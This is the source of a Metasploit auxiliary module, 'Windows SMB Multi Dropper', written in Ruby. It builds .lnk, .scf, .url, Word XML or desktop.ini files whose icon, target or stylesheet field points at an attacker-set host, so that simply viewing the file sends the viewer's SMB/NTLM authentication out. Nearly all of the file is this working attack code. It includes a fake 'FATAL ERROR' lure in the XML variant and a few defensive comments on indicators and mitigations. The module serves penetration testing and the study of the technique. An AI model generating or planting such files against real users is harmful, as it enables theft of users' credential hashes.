GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/fileformat/multidrop.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
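# Auxiliary file-format module that writes one of five Windows file types
# (.lnk, .scf, .url, Word .xml, desktop.ini). Each generated file embeds a
# UNC path or file:// URL that points at the LHOST option, so that rendering
# the file causes the viewing host to open an SMB/WebDAV connection to LHOST.
#
# Defensive notes for readers analysing this technique:
# - The common indicator across all five formats is an icon, shortcut target
#   or stylesheet reference that resolves to a remote host rather than a
#   local path (see the IconFile=, URL= and href= values built below).
# - The reference list cites NetNTLM hash capture as the impact. Blocking
#   outbound SMB (TCP 445) at the network edge and restricting outgoing NTLM
#   authentication to remote servers are the usual mitigations.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::FILEFORMAT

  # Registers module metadata and the two required options.
  #
  # @param info [Hash] metadata overrides merged in through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows SMB Multi Dropper',
        'Description' => %q{
          This module dependent on the given filename extension creates either
          a .lnk, .scf, .url, .xml, or desktop.ini file which includes a reference
          to the specified remote host, causing SMB connections to be initiated
          from any user that views the file.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Richard Davy - secureyourit.co.uk', # Module written by Richard Davy
          'Lnk Creation Code by Mubix', # Lnk Creation Code written by Mubix
          'asoto-r7' # Word XML creation code
        ],
        'Platform' => [ 'win' ],
        'References' => [
          ['URL', 'https://malicious.link/blog/2012/02/11/ms08_068-ms10_046-fun-until-2018'],
          ['URL', 'https://malicious.link/post/2012/2012-02-19-developing-the-lnk-metasploit-post-module-with-mona/'],
          ['URL', 'https://bohops.com/2018/08/04/capturing-netntlm-hashes-with-office-dot-xml-documents/'],
        ]
      )
    )

    register_options(
      [
        OptAddress.new("LHOST", [ true, "Host listening for incoming SMB/WebDAV traffic", nil]),
        OptString.new("FILENAME", [ true, "Filename - supports *.lnk, *.scf, *.url, *.xml, desktop.ini", "word.lnk"]),
      ]
    )
  end

  # Selects the file builder that matches the FILENAME option.
  #
  # The match is on the real extension (including the dot), so a name that
  # merely ends in the letters "lnk", "scf", "url" or "xml" is rejected as
  # BadConfig instead of producing a file that lacks the extension the
  # option text promises. Matching stays case-sensitive.
  def run
    filename = datastore['FILENAME']

    if filename.end_with?('.lnk')
      createlnk
    elsif filename.end_with?('.scf')
      createscf
    elsif filename == 'desktop.ini'
      create_desktopini
    elsif filename.end_with?('.url')
      create_url
    elsif filename.end_with?('.xml')
      create_xml
    else
      fail_with(Failure::BadConfig, 'Invalid FILENAME option')
    end
  end

  # Builds a Windows shortcut (.lnk) whose target is the local path
  # C:\AUTOEXEC.BAT and whose icon location is a UNC path on LHOST, then
  # hands the bytes to file_create.
  #
  # The byte sequence is order-dependent and is kept exactly as written;
  # only LHOST varies between generated files.
  def createlnk
    # Code below taken from module droplnk.rb written by Mubix
    lnk = ""
    lnk << "\x4c\x00\x00\x00" # Header size
    lnk << "\x01\x14\x02\x00\x00\x00\x00\x00" # Link CLSID
    lnk << "\xc0\x00\x00\x00\x00\x00\x00\x46"
    lnk << "\xdb\x00\x00\x00" # Link flags
    lnk << "\x20\x00\x00\x00" # File attributes
    lnk << "\x30\xcd\x9a\x97\x40\xae\xcc\x01" # Creation time
    lnk << "\x30\xcd\x9a\x97\x40\xae\xcc\x01" # Access time
    lnk << "\x30\xcd\x9a\x97\x40\xae\xcc\x01" # Write time
    lnk << "\x00\x00\x00\x00" # File size
    lnk << "\x00\x00\x00\x00" # Icon index
    lnk << "\x01\x00\x00\x00" # Show command
    lnk << "\x00\x00" # Hotkey
    lnk << "\x00\x00" # Reserved
    lnk << "\x00\x00\x00\x00" # Reserved
    lnk << "\x00\x00\x00\x00" # Reserved
    lnk << "\x7b\x00" # IDListSize
    # sIDList
    lnk << "\x14\x00\x1f\x50\xe0\x4f\xd0\x20"
    lnk << "\xea\x3a\x69\x10\xa2\xd8\x08\x00"
    lnk << "\x2b\x30\x30\x9d\x19\x00\x2f"
    lnk << "C:\\"
    lnk << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    lnk << "\x00\x00\x00\x4c\x00\x32\x00\x00\x00\x00\x00\x7d\x3f\x5b\x15\x20"
    lnk << "\x00"
    lnk << "AUTOEXEC.BAT"
    lnk << "\x00\x00\x30\x00\x03\x00\x04\x00\xef\xbe\x7d\x3f\x5b\x15\x7d\x3f"
    lnk << "\x5b\x15\x14\x00\x00\x00"
    lnk << Rex::Text.to_unicode("AUTOEXEC.BAT")
    lnk << "\x00\x00\x1c\x00\x00\x00"
    # sLinkInfo
    lnk << "\x3e\x00\x00\x00\x1c\x00\x00\x00\x01\x00"
    lnk << "\x00\x00\x1c\x00\x00\x00\x2d\x00\x00\x00\x00\x00\x00\x00\x3d\x00"
    lnk << "\x00\x00\x11\x00\x00\x00\x03\x00\x00\x00\x3e\x77\xbf\xbc\x10\x00"
    lnk << "\x00\x00\x00"
    lnk << "C:\\AUTOEXEC.BAT"
    lnk << "\x00\x00\x0e\x00"
    # RELATIVE_PATH
    lnk << Rex::Text.to_unicode(".\\AUTOEXEC.BAT")
    lnk << "\x03\x00"
    # WORKING_DIR
    lnk << Rex::Text.to_unicode("C:\\")
    # ICON LOCATION: the only field that references the remote host
    lnk << "\x1c\x00"
    lnk << Rex::Text.to_unicode("\\\\#{datastore['LHOST']}\\icon.ico")
    lnk << "\x00\x00\x03\x00\x00\xa0\x58\x00\x00\x00\x00\x00\x00\x00"
    lnk << "computer"
    lnk << "\x00\x00\x00\x00\x00\x00\x26\x4e\x06\x19\xf2\xa9\x31\x40\x91\xf0"
    lnk << "\xab\x9f\xb6\xb1\x6c\x84\x22\x03\x57\x01\x5e\x1d\xe1\x11\xb9\x48"
    lnk << "\x08\x00\x27\x6f\xe3\x1f\x26\x4e\x06\x19\xf2\xa9\x31\x40\x91\xf0"
    lnk << "\xab\x9f\xb6\xb1\x6c\x84\x22\x03\x57\x01\x5e\x1d\xe1\x11\xb9\x48"
    lnk << "\x08\x00\x27\x6f\xe3\x1f\x00\x00\x00\x00"

    file_create(lnk)
  end

  # Builds a shell command file (.scf) whose IconFile entry is a UNC path on
  # LHOST. The output has no trailing newline.
  def createscf
    scf = [
      '[Shell]',
      'Command=2',
      "IconFile=\\\\#{datastore['LHOST']}\\test.ico",
      '[Taskbar]',
      'Command=ToggleDesktop'
    ].join("\n")

    file_create(scf)
  end

  # Builds a desktop.ini whose IconFile entry is a UNC path on LHOST.
  # The output has no trailing newline.
  def create_desktopini
    ini = [
      '[.ShellClassInfo]',
      "IconFile=\\\\#{datastore['LHOST']}\\icon.ico",
      'IconIndex=1337'
    ].join("\n")

    file_create(ini)
  end

  # Builds an Internet shortcut (.url). Both the URL target (file://) and
  # the IconFile (UNC path) reference LHOST. Every line ends with a newline.
  def create_url
    lhost = datastore['LHOST']

    url = ""
    url << "[InternetShortcut]\n"
    url << "URL=file://#{lhost}/url.html\n"
    url << "IconFile=\\\\#{lhost}\\icon.ico\n"

    file_create(url)
  end

  # Builds a Word-associated XML document whose xml-stylesheet processing
  # instruction points at a file:// location on LHOST. The parts are
  # concatenated without line breaks.
  def create_xml
    xml = ""
    xml << "<?xml version='1.0' encoding='utf-8' ?>"
    xml << "<?mso-application progid='Word.Document'?>"
    # The stylesheet href is the only reference to the remote host.
    xml << "<?xml-stylesheet type='text/xsl' href='file://#{datastore['LHOST']}/share/word.xsl'?>"
    xml << "<Text>"
    xml << " FATAL ERROR: The document failed to render properly."
    xml << "</Text>"

    file_create(xml)
  end
end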